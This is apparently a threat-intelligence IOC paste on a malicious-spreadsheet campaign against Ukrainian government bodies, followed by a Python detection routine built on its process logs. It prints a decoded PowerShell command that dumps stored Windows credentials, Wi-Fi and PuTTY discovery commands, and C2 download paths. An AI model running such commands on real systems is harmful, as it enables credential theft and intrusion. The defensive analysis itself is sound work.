- #IOC #OptiData #VR #Elephant #GrimPlant #GraphSteel #Hobot
- https://pastebin.com/Z9PLqtpE
- previous_contact: n/a
- FAQ:
- https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/
- https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/
- https://cert.gov.ua/article/39882
- https://excelvba.ru/code/tools/Attachments
- https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel
- https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant
- attack_vector
- --------------
- email > XLS > VBA > extract EXE1 (base64) > get EXE2 > get EXE3 > get EXE4 > exfil to 212.192.246.115
- # # # # # # # #
- email_headers
- # # # # # # # #
- Received: from mail3.nest.vn.ua ([193.243.158.20])
- Received: from WINR8K088HRVJH (unknown [87.249.139.170]) by mail3.nest.vn.ua (Postfix) with ESMTPSA id F265D342979
- From: "trembitskyy@vndsp.gov.ua" <trembitskyy@vndsp.gov.ua>
- X-Mailer: Smart_Send_4_4_2
- Date: Thu, 28 Apr 2022 01:46:40 +0300
- Message-ID: <7304491317264122489710@WIN-R8K088HRVJH>
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 8cdd84285c936da43cf7c4506b6372a4806b0a90d3db29a72eaa7626dc83896b First Submission 2022-04-26 07:12:50 UTC
- File name Aid request COVID-19-04_5_22--.xls [ MS Excel Spreadsheet + SheetForAttachedFiles]
- File size 9.44 MB (9897472 bytes)
- SHA-256 ed448b9c4e604c7c6531864ac023cdd8865affab409d581db66281179532fc69 First Submission 2022-04-26 07:37:22 UTC
- File name base_update.exe _dropper_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
- File size 4.29 MB (4499408 bytes)
- SHA-256 f2a09b611b6fca3e82b8c3098abc35929779685a9e3f851a6acf4040be002f41 First Submission 2022-04-22 15:49:06 UTC
- File name java-sdk.exe _downloader_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
- File size 5.90 MB (6191616 bytes)
- SHA-256 aca731d34c3e99d07af79847db369409e92e387520e44285608f18877b3a1d79 First Submission 2022-04-26 07:53:56 UTC
- File name oracle-java.exe _implant_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
- File size 9.55 MB (10016256 bytes)
- SHA-256 47a734e624dac47b9043606c8833001dde8f341d71f77129da2eade4e02b3878 First Submission 2022-04-24 14:03:56 UTC
- File name microsoft-cortana.exe _client_ [ PE32+ executable for MS Windows (GUI) Mono/.Net assembly ]
- File size 9.04 MB (9481728 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR 212.192.246.115/i - get downloader java-sdk.exe
- 212.192.246.115/p - get implant oracle-java.exe
- 212.192.246.115/m - get client microsoft-cortana.exe
- C2 212.192.246.115/c
- netwrk
- --------------
- 212.192.246.115 212.192.246.115:443 443 HTTP GET /i HTTP/1.1 -hobot-
- 212.192.246.115 212.192.246.115:443 443 HTTP GET /p HTTP/1.1 -hobot-
- 212.192.246.115 212.192.246.115:443 443 HTTP GET /m HTTP/1.1 -hobot-
- 3.220.57.224 api.ipify.org 443 TLSv1 Client Hello
- 212.192.246.115 212.192.246.115:443 443 HTTP GET /c HTTP/1.1 -hobot-
- comp
- --------------
- base_update.exe 2952 212.192.246.115 443 ESTABLISHED
- java-sdk.exe 3684 212.192.246.115 443 ESTABLISHED
- oracle-java.exe 1088 212.192.246.115 80 ESTABLISHED
- oracle-java.exe 1088 3.220.57.224 443 ESTABLISHED
- microsoft-cortana.exe 1412 212.192.246.115 443 ESTABLISHED
- microsoft-cortana.exe 1412 3.220.57.224 443 ESTABLISHED
- oracle-java.exe 1088 212.192.246.115 80 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
- C:\tmp\base_update.exe
- C:\Users\operator/.java-sdk/java-sdk.exe -a YdlP+kKrV+icT7cT1PCcwA==
- C:\Users\operator/.java-sdk/oracle-java.exe -addr YdlP+kKrV+icT7cT1PCcwA==
- C:\Users\operator/.java-sdk/microsoft-cortana.exe -addr YdlP+kKrV+icT7cT1PCcwA==
- C:\Windows\system32\cmd.exe /Q /C netsh wlan show profiles
- C:\Windows\system32\netsh.exe wlan show profiles
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /Q /C -encodedCommand WwB2AG8AaQBkAF0AWwBXA...
- C:\Windows\system32\cmd.exe /Q /C powershell reg query HKCU\Software\SimonTatham\Putty\Sessions
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe reg query HKCU\Software\SimonTatham\Putty\Sessions
- C:\Windows\system32\reg.exe query HKCU\Software\SimonTatham\Putty\Sessions
- . . .
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 28.04.2022 16:24
- Java-SDK c:\users\operator\.java-sdk\java-sdk.exe 01.01.1970 3:00
- C:\Users\operator\.java-sdk\java-sdk.exe -a YdlP+kKrV+icT7cT1PCcwA==
- drop
- --------------
- %tmp%\base_update.exe
- %tmp%\prefix954622903
- %tmp%\prefix...
- C:\Users\%user%\.java-sdk\java-sdk.exe
- C:\Users\%user%\.java-sdk\microsoft-cortana.exe
- C:\Users\%user%\.java-sdk\oracle-java.exe
- # # # # # # # #
- additional info
- # # # # # # # #
- xls metadata
- --------------
- File Name : Aid request COVID-19-04_5_22--.xls
- Directory : .
- File Size : 9.4 MiB
- File Modification Date/Time : 2022:04:28 09:35:09+03:00
- File Access Date/Time : 2022:04:28 16:22:14+03:00
- File Inode Change Date/Time : 2022:04:28 16:22:05+03:00
- File Permissions : -rw-rw-r--
- File Type : XLS
- File Type Extension : xls
- MIME Type : application/vnd.ms-excel
- Title :
- Subject :
- Author : Apache POI
- Comments :
- Template :
- Last Modified By : Пользователь
- Revision Number : 1
- Software : Microsoft Excel
- Total Edit Time : 1.0 minutes
- Create Date : 2020:04:30 13:56:23
- Modify Date : 2022:04:21 18:56:05
- Security : Password protected
- App Version : 16.0000
- Scale Crop : No
- Links Up To Date : No
- Shared Doc : No
- Hyperlinks Changed : No
- Title Of Parts : All request, Ministry of Defense, Updating data, Ministry of Economy, Ministry of Education%Science, Ministry of Energy&Environment, Ministry of Finance, Ministry of Health, Ministry of Infrastructure, Ministry of Internal Affairs, Ministry of Justice, Ministry of Reintegration, Ministry of Social Policy, National Guard, National Police, State Audit Service, State Border Guard Service, State Customs Service, State Emergency Service, State Fiscal Service, State Security Service, State Service of Special Commun, State Service for Geodesy, State Tax Service
- Heading Pairs : Листы, 24
- Code Page : Windows Cyrillic
- Direction : EngRus**
- Translated : -1
- Comp Obj User Type Len : 27
- Comp Obj User Type : Microsoft Excel 2003
- powershell decoded & deobfuscated
- ----------------------------------
- [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() | % { $_.RetrievePassword();$_} | Select UserName, Resource, Password | Format-Table -HideTableHeaders
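Added example, not part of the paste: a small Python triage routine that runs the behaviours listed under "proc" (hidden .java-sdk drop directory in the user profile, netsh wlan profile discovery, reg query of PuTTY sessions) and the decoded PowerShell above as rules over process command lines. The sample events are constructed from the "proc" section; the -encodedCommand blob is rebuilt here by encoding the decoded one-liner the way PowerShell expects (base64 over UTF-16LE), since the paste truncates it. Rule names and the helper functions are my own, not from any of the referenced reports.

```python
import base64
import binascii
import re

# Decoded PowerShell one-liner from the paste (Windows PasswordVault credential dump).
DECODED_PS = (
    "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,"
    "ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;"
    "$vault.RetrieveAll() | % { $_.RetrievePassword();$_} | Select UserName, Resource, Password | "
    "Format-Table -HideTableHeaders"
)


def encode_ps(script: str) -> str:
    """Encode a script the way -encodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample input modelled on the "proc" section; last line is a benign control.
SAMPLE_EVENTS = [
    r"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE",
    r"C:\tmp\base_update.exe",
    r"C:\Users\operator/.java-sdk/java-sdk.exe -a YdlP+kKrV+icT7cT1PCcwA==",
    r"C:\Windows\system32\cmd.exe /Q /C netsh wlan show profiles",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /Q /C -encodedCommand " + encode_ps(DECODED_PS),
    r"C:\Windows\system32\reg.exe query HKCU\Software\SimonTatham\Putty\Sessions",
    r"C:\Windows\system32\notepad.exe C:\Users\operator\notes.txt",
]

# (tag, regex) pairs; tag names are mine. Both slash styles are accepted because the
# paste shows the implant building paths with mixed separators.
RULES = [
    ("hidden_user_dropdir", re.compile(r"[\\/]Users[\\/][^\\/]+[\\/]\.java-sdk[\\/]", re.I)),
    ("wlan_profile_discovery", re.compile(r"\bnetsh(?:\.exe)?\s+wlan\s+show\s+profiles\b", re.I)),
    ("putty_session_discovery",
     re.compile(r"\breg(?:\.exe)?\s+query\s+HKCU\\Software\\SimonTatham\\Putty\\Sessions\b", re.I)),
]
# PowerShell accepts any unambiguous prefix of -EncodedCommand (and -ec); capture flag and blob.
ENCODED_ARG = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(blob: str):
    """Return the UTF-16LE script behind an -encodedCommand blob, or None if it is not valid base64
    (e.g. the truncated 'WwB2AG8AaQBkAF0AWwBXA' fragment shown in the paste)."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def triage(cmdline: str) -> list:
    """Return the tags one process command line triggers, in rule order."""
    tags = [tag for tag, rx in RULES if rx.search(cmdline)]
    m = ENCODED_ARG.search(cmdline)
    if m:
        flag = m.group(1).lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            tags.append("encoded_powershell")
            script = decode_encoded_command(m.group(2))
            if script and "PasswordVault" in script and "RetrievePassword" in script:
                tags.append("passwordvault_credential_dump")
    return tags


def scan(events) -> list:
    """Return (cmdline, tags) for every event that triggered at least one rule."""
    hits = []
    for cmdline in events:
        tags = triage(cmdline)
        if tags:
            hits.append((cmdline, tags))
    return hits


if __name__ == "__main__":
    for cmdline, tags in scan(SAMPLE_EVENTS):
        print(", ".join(tags), "<-", cmdline[:90])
```

Running the block over the sample events flags the four malicious lines and leaves EXCEL.EXE, the dropper in %tmp% and the notepad control untouched; the re-encoded blob begins with the same "WwB2AG8AaQBkAF0AWwBXA" prefix the paste shows, which confirms the decoding above. Decoding the argument rather than matching the base64 text is what keeps the PasswordVault rule stable against re-encoding with different whitespace or variable names.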
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- Dropped files
- **************
- https://www.virustotal.com/gui/file/8cdd84285c936da43cf7c4506b6372a4806b0a90d3db29a72eaa7626dc83896b/details
- https://www.virustotal.com/gui/file/ed448b9c4e604c7c6531864ac023cdd8865affab409d581db66281179532fc69/details
- https://analyze.intezer.com/analyses/7352b66e-04e6-4b8a-b0b6-97443570103e
- https://www.virustotal.com/gui/file/f2a09b611b6fca3e82b8c3098abc35929779685a9e3f851a6acf4040be002f41/details
- https://analyze.intezer.com/analyses/113ed91f-51cf-4a7d-abc7-d4a61e03bf03
- https://www.virustotal.com/gui/file/aca731d34c3e99d07af79847db369409e92e387520e44285608f18877b3a1d79/details
- https://analyze.intezer.com/analyses/4662ac0b-a3a2-4259-86c9-875739feb102
- https://www.virustotal.com/gui/file/47a734e624dac47b9043606c8833001dde8f341d71f77129da2eade4e02b3878/details
- https://analyze.intezer.com/analyses/ae7a608e-c54c-4e19-a2fb-c217646c4e3b
- PL_SCR
- **************
- https://www.virustotal.com/gui/ip-address/212.192.246.115/details
- C2
- **************
- https://www.virustotal.com/gui/ip-address/212.192.246.115/details
- VR